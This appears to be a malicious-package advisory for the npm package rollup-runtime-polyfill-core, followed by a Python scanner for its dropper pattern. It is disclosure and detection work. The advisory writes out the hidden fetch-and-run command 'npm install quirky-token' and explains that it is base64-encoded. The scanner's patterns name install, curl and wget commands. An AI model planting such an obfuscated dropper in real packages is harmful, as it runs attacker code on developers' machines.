rollup-runtime-polyfill-core @0.13.7

Vulnerability report · Last retrieved from osv.dev June 24, 2026 at 6:36 AM UTC

Malicious

OSV ID

MAL-2026-6372

Ecosystem

npm

Summary

The package rollup-runtime-polyfill-core impersonates the legitimate rollup-plugin-polyfill-node and even copies that project's GitHub URL into its own package.json repository.url. The shipped dist/index.js reproduces the legitimate plugin's code with an appended dropper: on module load, ValidateSvgModule() decodes a base64 string to the shell command npm install quirky-token --no-save --silent --no-audit --no-fund and spawns it; on child close, a second base64 string decodes to quirky-token, which is then require()d and invoked. Any project that requires this rollup plugin silently downloads and executes arbitrary code from the attacker-controlled quirky-token package with the consumer's privileges. The shell command and module name are base64-encoded specifically to evade casual code review and basic static scanners — there is no legitimate reason for a rollup plugin to obfuscate an npm install invocation.

Source: amazon-inspector (e1923adcd8dc53c5f68d2b6f1ef453f5dc52a71fcb2b9e9db502d308e5ef4311)
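A defender-side check for the pattern this summary describes, added here as an example and not code from the advisory or from Amazon Inspector: it walks JavaScript source for base64 string literals, decodes them, and flags any that decode to a package-manager install command or to a bare module name of the kind handed to require(). The sample JavaScript lines are constructed for the demo (the command and module name are the ones quoted in the summary), and the regexes are heuristics written for this example rather than a published signature.

```python
"""Flag base64 literals in JavaScript source that decode to an npm install
command or a bare module name, the dropper pattern described above."""
import base64
import re

# A quoted run of base64 alphabet long enough to hide a command or a name.
B64_LITERAL = re.compile(r"""(['"])([A-Za-z0-9+/]{12,}={0,2})\1""")
# Decoded text a build plugin has no reason to produce at module load time
# (heuristic, constructed for this example).
SHELL_CMD = re.compile(
    r"^\s*(npm|npx|yarn|pnpm)\s+(install|i|add|exec|dlx)\b|\b(curl|wget)\s|\bsh\s+-c\b")
# Loose approximation of an npm package name, i.e. what gets handed to require().
PKG_NAME = re.compile(r"^(@[a-z0-9._~-]+/)?[a-z0-9._~-]+$")


def decode_literal(literal):
    """Return the literal decoded as printable UTF-8 text, or None if it is not text."""
    try:
        text = base64.b64decode(literal, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def scan_source(src):
    """Return (line_number, kind, decoded_text) for each suspicious literal."""
    findings = []
    for lineno, line in enumerate(src.splitlines(), 1):
        for m in B64_LITERAL.finditer(line):
            decoded = decode_literal(m.group(2))
            if decoded is None:
                continue  # binary payload (icons, fonts) or garbage: not this pattern
            if SHELL_CMD.search(decoded):
                findings.append((lineno, "shell-command", decoded))
            elif PKG_NAME.match(decoded):
                findings.append((lineno, "module-name", decoded))
    return findings


def b64(text):
    return base64.b64encode(text.encode()).decode()


# Constructed stand-in for the tail of a trojanised dist/index.js: only the
# string constants, using the command and module name quoted in the summary.
SAMPLE_JS = "\n".join([
    'const cmd = Buffer.from("%s", "base64").toString();'
    % b64("npm install quirky-token --no-save --silent --no-audit --no-fund"),
    'const mod = Buffer.from("%s", "base64").toString();' % b64("quirky-token"),
    'const icon = "iVBORw0KGgoAAAANSUhEUgAAAAEAAAAB";',  # PNG bytes: binary, ignored
    'const greeting = "SGVsbG8sIFdvcmxkIQ==";',  # "Hello, World!": text, but benign
])

if __name__ == "__main__":
    for lineno, kind, decoded in scan_source(SAMPLE_JS):
        print(f"line {lineno}: {kind}: {decoded!r}")
```

Run it over every .js file in an installed package's dist/ to triage; a "shell-command" hit in a build plugin is a strong signal, a lone "module-name" hit is a prompt to read the surrounding code.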
